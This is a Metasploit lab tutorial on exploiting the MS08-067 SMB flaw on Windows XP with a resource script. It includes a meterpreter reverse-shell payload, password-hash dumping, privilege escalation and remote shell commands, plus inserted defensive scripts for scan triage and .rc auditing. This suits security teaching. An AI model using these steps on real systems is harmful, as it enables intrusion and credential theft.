exploit using resource script – metasploit

How to exploit using a resource script?

In the Metasploit framework, a resource script is the set of console instructions required to make an exploit attempt, so the whole attempt can be replayed from one file.

Warning: don't try this on any public, corporate or unauthorized networks. Perform this only when you have authorization to do so.

An exploit attempt with the Metasploit framework can be made using different approaches: msfcli, msfconsole, shell scripting and resource scripting.

In this guide we are going to use Windows XP as our target (victim) and Kali Linux as the attacker.

We are going to create a resource script (.rc) file to automate the exploitation.

Lab – Setup (exploit using resource script)

Target (victim):
OS in target: Windows XP
Exploit: ms08-067
Port: 445

Attacker:
OS in attacker: Kali Linux
Exploit framework: Metasploit
Exploit method: msfcli

Start the Metasploit framework and PostgreSQL services
#/etc/init.d/metasploit start
#/etc/init.d/postgresql start

Check for known vulnerabilities in the target PC using the nmap scripting engine (NSE).

In our attempt we are going to check for SMB vulnerabilities using nmap, a very powerful tool.

Run locate for .nse files to find out the exact location of the nmap scripts; the script file extension is ".nse".

#locate .nse

The default location of nmap scripting in Kali Linux: /usr/share/nmap/scripts/

Switch to /usr/share/nmap/scripts/, and list all the scripts
#cd /usr/share/nmap/scripts/

List out only smb*
#ls smb*

Check for the vulnerability in the remote PC by running the nmap command below with the script (replace <target IP> with the victim's address).

#nmap --script=smb-check-vulns.nse --script-args=unsafe=1 <target IP>
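The same scan is more useful to the people who have to fix the hosts than to the attacker: run it with -oX to get an XML report, and turn the report into a patch list. The script below is an added example, not code from the original post or from nmap; the XML it parses is constructed for the example and modelled on nmap's -oX layout and the "NAME: STATE" lines the smb-check-vulns script prints, so adjust the parser if your nmap version reports differently.

```python
"""Turn the nmap smb-check-vulns scan from the page into a patch list.

Added example, not code from the original post. It reads nmap's XML report
(the same scan run with '-oX scan.xml') and lists which hosts the script
reports as VULNERABLE to MS08-067 so they can be patched (KB958644) or
isolated. SAMPLE_XML is constructed for this example.
"""
import xml.etree.ElementTree as ET

# Constructed sample report; 192.0.2.0/24 is a documentation range (RFC 5737).
SAMPLE_XML = """\
<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap --script=smb-check-vulns.nse --script-args=unsafe=1 -oX scan.xml 192.0.2.0/29">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-check-vulns" output="&#10;  MS08-067: VULNERABLE&#10;  Conficker: Likely CLEAN&#10;  regsvc DoS: NOT VULNERABLE&#10;  MS06-025: NO SERVICE (the Ras RPC service is inactive)"/>
    </hostscript>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-check-vulns" output="&#10;  MS08-067: NOT VULNERABLE&#10;  Conficker: Likely CLEAN&#10;  regsvc DoS: NOT VULNERABLE"/>
    </hostscript>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.0.2.12" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_check_output(output):
    """Split the script's 'NAME: STATE' lines into a {name: state} dict."""
    checks = {}
    for line in output.splitlines():
        line = line.strip()
        if ":" not in line:
            continue
        name, state = line.split(":", 1)  # split once: states may contain ':'
        checks[name.strip()] = state.strip()
    return checks


def triage(xml_text):
    """Map each scanned IPv4 host to its smb-check-vulns results ({} if none)."""
    root = ET.fromstring(xml_text)
    results = {}
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        script = host.find("hostscript/script[@id='smb-check-vulns']")
        output = script.get("output", "") if script is not None else ""
        results[addr_el.get("addr")] = parse_check_output(output)
    return results


def patch_list(xml_text):
    """(addr, check) pairs the scan reports as VULNERABLE, sorted by address."""
    findings = []
    for addr, checks in triage(xml_text).items():
        for name, state in checks.items():
            # 'NOT VULNERABLE' and 'Likely CLEAN' must not match, so test the prefix
            if state.upper().startswith("VULNERABLE"):
                findings.append((addr, name))
    return sorted(findings)


def unchecked_hosts(xml_text):
    """Hosts the scan could not assess (no script output); they still need a look."""
    return sorted(addr for addr, checks in triage(xml_text).items() if not checks)


if __name__ == "__main__":
    for addr, check in patch_list(SAMPLE_XML):
        print(f"{addr}: {check} reported VULNERABLE, patch or isolate")
    for addr in unchecked_hosts(SAMPLE_XML):
        print(f"{addr}: no smb-check-vulns result, verify manually")
```

Hosts with no script output are reported separately rather than silently treated as clean: SMB may have been filtered, or the host may have stopped answering, and an absent result is not a negative one.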


Let's start writing the resource script file (.rc). It holds one msfconsole command per line, and lines beginning with # are comments; a comment must sit on its own line, because msfconsole would otherwise treat the trailing words as part of the option value.

#vi ms08-067.rc
# set exploit
use exploit/windows/smb/ms08_067_netapi
# set payload for reverse shell
set PAYLOAD windows/meterpreter/reverse_tcp
# set target (victim) IP address
set RHOST <target IP>
# set local IP (attacker)
set LHOST <attacker IP>
# set reverse shell binding port
set LPORT 4444
set ExitOnSession false
# push the exploit into the background
exploit -j -z

Save & Exit!

Let's run the resource script
#msfconsole -r ms08-067.rc
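A resource file is also an artifact: a red team wants to check one before running it, and an incident responder who recovers one from a compromised box wants to know what it would have done without starting msfconsole. The following is an added example, not code from the original post or from the Metasploit project; it understands only the commands the page's script uses (use, set, exploit/run and # comment lines) and flags the two mistakes in the page's original script, a set line with a value but no option name and trailing # comments that become part of the value. Both sample scripts are constructed for the example.

```python
"""Static audit of a Metasploit resource script (.rc).

Added example, not code from the original post. It never starts msfconsole;
it only parses the console commands the page's script uses and reports
what they would configure, plus anything that looks wrong.
"""
import shlex

# Constructed sample modelled on the page's ms08-067.rc. 192.0.2.1 is a
# documentation address (RFC 5737); RHOST is left empty on purpose.
SAMPLE_RC = """\
# set exploit
use exploit/windows/smb/ms08_067_netapi
# set payload for reverse shell
set PAYLOAD windows/meterpreter/reverse_tcp
# target (victim) IP address: left empty here, as in the page's script
set RHOST
set LHOST 192.0.2.1
set LPORT 4444
set ExitOnSession false
exploit -j -z
"""

# Constructed sample reproducing the page's original mistakes: 'set' with a
# value but no option name, and trailing '#' comments on command lines.
BUGGY_RC = """\
use exploit/windows/smb/ms08_067_netapi
set windows/meterpreter/reverse_tcp #set payload for reverse shell
set LPORT 4444 #set reverse shell binding port
exploit -j -z
"""


def parse_rc(text):
    """Return {'module', 'options', 'problems'} for the script.

    msfconsole skips lines whose first character is '#'; every other line is
    a console command. 'set NAME VALUE' joins all words after NAME into the
    value, so a trailing '# comment' silently becomes part of it.
    """
    report = {"module": None, "options": {}, "problems": []}
    problems = report["problems"]
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            words = shlex.split(line)  # '#' is not a comment character here
        except ValueError as exc:
            problems.append(f"line {lineno}: cannot tokenise ({exc})")
            continue
        cmd = words[0]
        if cmd == "use":
            if len(words) < 2:
                problems.append(f"line {lineno}: 'use' without a module")
            else:
                report["module"] = words[1]
        elif cmd == "set":
            if len(words) == 1:
                problems.append(f"line {lineno}: 'set' without option name or value")
                continue
            name = words[1]
            if "/" in name:  # a module path where an option name should be
                problems.append(f"line {lineno}: 'set {name}' looks like a value "
                                "with no option name (did you mean 'set PAYLOAD ...'?)")
                continue
            if len(words) == 2:
                problems.append(f"line {lineno}: 'set {name}' has no value")
                continue
            value = " ".join(words[2:])
            if "#" in value:
                problems.append(f"line {lineno}: trailing comment becomes part of "
                                f"{name}'s value: {value!r}")
            # datastore option names are case-insensitive; normalise for lookup
            report["options"][name.upper()] = value
        elif cmd in ("exploit", "run"):
            if report["module"] is None:
                problems.append(f"line {lineno}: '{cmd}' before any 'use'")
            if "PAYLOAD" not in report["options"]:
                problems.append(f"line {lineno}: '{cmd}' with no PAYLOAD set")
    return report


def is_clean(text):
    """True when the script parses without any flagged problem."""
    return not parse_rc(text)["problems"]


if __name__ == "__main__":
    for label, rc in (("sample", SAMPLE_RC), ("buggy", BUGGY_RC)):
        rep = parse_rc(rc)
        print(f"[{label}] module={rep['module']} options={rep['options']}")
        for problem in rep["problems"]:
            print("  !", problem)
```

Running it on the page's own script (BUGGY_RC) reports three problems: the payload line sets no option, the LPORT value swallows its comment, and the exploit line therefore runs without a PAYLOAD. The corrected layout (SAMPLE_RC) is clean apart from the deliberately empty RHOST.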

Let's list the meterpreter sessions and their IDs
msf exploit(ms08_067_netapi) > sessions -l

Connect to a meterpreter session
msf exploit(ms08_067_netapi) > sessions -i 1

Once the meterpreter session is established, proceed to post exploitation.

The help command shows the usage of the commands available during post exploitation, information gathering or privilege escalation.

Run post exploitation commands to gather information about remote PC

meterpreter > help

Get the password hashes from the SAM database
meterpreter > hashdump

Privilege escalation to the SYSTEM account
meterpreter > getsystem

View network settings
meterpreter > ipconfig

System information
meterpreter > sysinfo

Capture a screenshot of the remote (victim's) PC; it is stored in the current working directory.
meterpreter > screenshot

Get into the shell of the target PC and execute mkdir, rm, copy or any other command.
meterpreter > shell


Watch: How to exploit using resource script
